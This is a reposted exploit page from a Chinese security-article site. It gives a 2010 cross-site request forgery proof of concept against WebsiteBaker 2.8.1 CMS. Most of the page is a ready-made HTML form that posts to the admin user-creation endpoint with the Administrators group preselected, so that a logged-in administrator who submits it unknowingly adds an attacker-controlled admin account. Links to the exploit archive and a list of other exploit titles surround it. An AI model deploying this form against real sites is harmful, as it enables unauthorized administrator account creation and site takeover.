WebsiteBaker 2.8.1 CSRF Proof of Concept

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

WebsiteBaker 2.8.1 CSRF Proof of Concept

来源：http://hacktalk.net 作者：Santana 发布时间：2010-06-21

# Author: Luis Santana
# Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&id=1269641667
# Version: 2.8.1
# Tested on: All
# Code : http://hacktalk.net/exploits/websitebakercsrfPOC.zip

The full advisory can be found at
http://hacktalk.net/exploits/websitebakerCSRF.txt

Regards,
Luis Santana
Admin - http://hacktalk.net
HackTalk Security

<h1>WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security</h1>
<form name="user"action="http://demo.opensourcecms.com/websitebaker/admin/users/add.php" method="post" class="">
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="username_fieldname" value="username_08y7h65u" />

<table cellpadding="5" cellspacing="0" border="0" width="100%">
<tr>
<td width="150">Username:</td>
<td class="value_input">
<input type="text" name="username_08y7h65u" maxlength="30" value="" />
</td>
</tr>
<tr>
<td>Password:</td>

<td class="value_input">
<input type="password" name="password" maxlength="30" />
</td>
</tr>
<tr>
<td>Re-type Password:</td>
<td class="value_input">
<input type="password" name="password2" maxlength="30" />
</td>

</tr>
<tr style="display:none;">
<td> </td>
<td style="font-size: 10px;">
Please note: You should only enter values in the above fields if you wish to change this users password
</td>
</tr>
<tr>
<td>Display Name:</td>
<td class="value_input">
<input type="text" name="display_name" maxlength="255" value="" />

</td>
</tr>
<tr>
<td>Email:</td>
<td class="value_input">
<input type="text" name="email" maxlength="255" value="" />
</td>
</tr>
<tr style="">
<td>Home Folder:</td>

<td class="value_input">
<select name="home_folder">
<option value="">None</option>

<option value="/testbild" >/media/testbild</option>
</select>
</td>
</tr>
<tr>

<td>Group:</td>
<td class="value_input">
<select name="groups[]" multiple="multiple" size="5">

<option value="1" >Administrators</option>
</select>
</td>
</tr>
<tr>

<td> </td>
<td>
<input type="radio" name="active[]" id="active" value="1" checked="checked" />
<label for="active">Active</label>
<input type="radio" name="active[]" id="disabled" value="0" />
<label for="disabled">Disabled</label>
</td>
</tr>

<tr>
<td> </td>
<td>
<input type="submit" name="submit" value="Add" />
<input type="reset" name="reset" value="Reset" />
</td>
</tr>
</table>

</form>


<p>Greetz to Shardy, Xires and Stacy, Rage, and n3xus</p>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告